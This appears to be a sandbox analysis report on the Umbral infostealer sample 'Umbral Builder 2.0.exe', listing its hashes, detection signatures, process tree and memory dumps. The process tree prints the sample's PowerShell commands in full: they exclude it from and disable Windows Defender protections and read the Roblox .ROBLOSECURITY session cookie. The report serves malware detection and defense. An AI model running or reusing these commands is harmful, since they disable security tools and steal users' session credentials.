Overview

overview

10

Static

static

10

Umbral Bui....0.exe

windows7-x64

10

Umbral Bui....0.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    14s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    04-11-2023 10:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Umbral Builder 2.0.exe

  • Size

    296KB

  • MD5

    0c1911851b28c7c2c475ec85c6762b3d

  • SHA1

    1b62107460f6225073fa3d69d85530dd6013ca69

  • SHA256

    ee31a42c43a6b47c76535cca780ff3282bea54012105d5c8f1e008ee9d97da82

  • SHA512

    3da12248d95f04ed389faa3bdea994fef22bda6c4c821520cc580eca81b089cf9bcfea01757f12a30e495bc51716b7cf72ac2d7ae22352dc771bdf8a0fb6b9a0

  • SSDEEP

    6144:dloZMCrIkd8g+EtXHkv/iD4dokdrR/k4XcG/BcoNkbb8e1msOi:/oZZL+EP8dokdrR/k4XcG/BcoNClj

Score
10/10
umbralspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral Builder 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral Builder 2.0.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral Builder 2.0.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:556
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2780
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2224
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2404
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1956
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      de6e76c2d9e9a4c860b5ac3060e48ed8

      SHA1

      6d333b4c1f970146d9a3ea6956979d4f0281e6db

      SHA256

      03b38bb9f3f1fc71701c95a04d59c4ebe42349f964c4d59c5008fb890b4def86

      SHA512

      df0eb1aab9170b10515bb56b6525c90e9db0a804fa40233227f1836467e2184f34f0b20edba5481ab2db4a53712844239291fe665eceb6c885fbaaeb76b71b11

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      de6e76c2d9e9a4c860b5ac3060e48ed8

      SHA1

      6d333b4c1f970146d9a3ea6956979d4f0281e6db

      SHA256

      03b38bb9f3f1fc71701c95a04d59c4ebe42349f964c4d59c5008fb890b4def86

      SHA512

      df0eb1aab9170b10515bb56b6525c90e9db0a804fa40233227f1836467e2184f34f0b20edba5481ab2db4a53712844239291fe665eceb6c885fbaaeb76b71b11

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      de6e76c2d9e9a4c860b5ac3060e48ed8

      SHA1

      6d333b4c1f970146d9a3ea6956979d4f0281e6db

      SHA256

      03b38bb9f3f1fc71701c95a04d59c4ebe42349f964c4d59c5008fb890b4def86

      SHA512

      df0eb1aab9170b10515bb56b6525c90e9db0a804fa40233227f1836467e2184f34f0b20edba5481ab2db4a53712844239291fe665eceb6c885fbaaeb76b71b11

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      de6e76c2d9e9a4c860b5ac3060e48ed8

      SHA1

      6d333b4c1f970146d9a3ea6956979d4f0281e6db

      SHA256

      03b38bb9f3f1fc71701c95a04d59c4ebe42349f964c4d59c5008fb890b4def86

      SHA512

      df0eb1aab9170b10515bb56b6525c90e9db0a804fa40233227f1836467e2184f34f0b20edba5481ab2db4a53712844239291fe665eceb6c885fbaaeb76b71b11

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DKV4OB24Q5TJ803IH9CF.temp
      Filesize

      7KB

      MD5

      de6e76c2d9e9a4c860b5ac3060e48ed8

      SHA1

      6d333b4c1f970146d9a3ea6956979d4f0281e6db

      SHA256

      03b38bb9f3f1fc71701c95a04d59c4ebe42349f964c4d59c5008fb890b4def86

      SHA512

      df0eb1aab9170b10515bb56b6525c90e9db0a804fa40233227f1836467e2184f34f0b20edba5481ab2db4a53712844239291fe665eceb6c885fbaaeb76b71b11

      Download Submit

    • memory/556-57-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/556-54-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/556-59-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/556-55-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/556-58-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/556-53-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1956-74-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1956-72-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1956-71-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1956-73-0x00000000029F0000-0x0000000002A70000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1956-75-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1956-69-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1956-68-0x0000000002410000-0x0000000002418000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1956-70-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2204-27-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2204-21-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2204-28-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2204-25-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2204-26-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2204-20-0x000000001B300000-0x000000001B5E2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2204-22-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2204-23-0x00000000029B0000-0x0000000002A30000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2204-24-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2488-40-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2488-45-0x0000000002680000-0x0000000002700000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2488-47-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2488-42-0x0000000002680000-0x0000000002700000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2488-46-0x0000000002680000-0x0000000002700000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2488-44-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2488-43-0x0000000002680000-0x0000000002700000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2764-0-0x0000000000EA0000-0x0000000000EF0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2764-41-0x000007FEF5840000-0x000007FEF622C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2764-56-0x0000000000410000-0x0000000000490000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2764-2-0x0000000000410000-0x0000000000490000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2764-1-0x000007FEF5840000-0x000007FEF622C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2764-79-0x000007FEF5840000-0x000007FEF622C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2988-7-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2988-10-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2988-8-0x0000000001C40000-0x0000000001C48000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2988-9-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2988-14-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2988-13-0x00000000025A0000-0x0000000002620000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2988-11-0x00000000025A0000-0x0000000002620000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2988-12-0x00000000025A0000-0x0000000002620000-memory.dmp

      Filesize

      512KB

      Download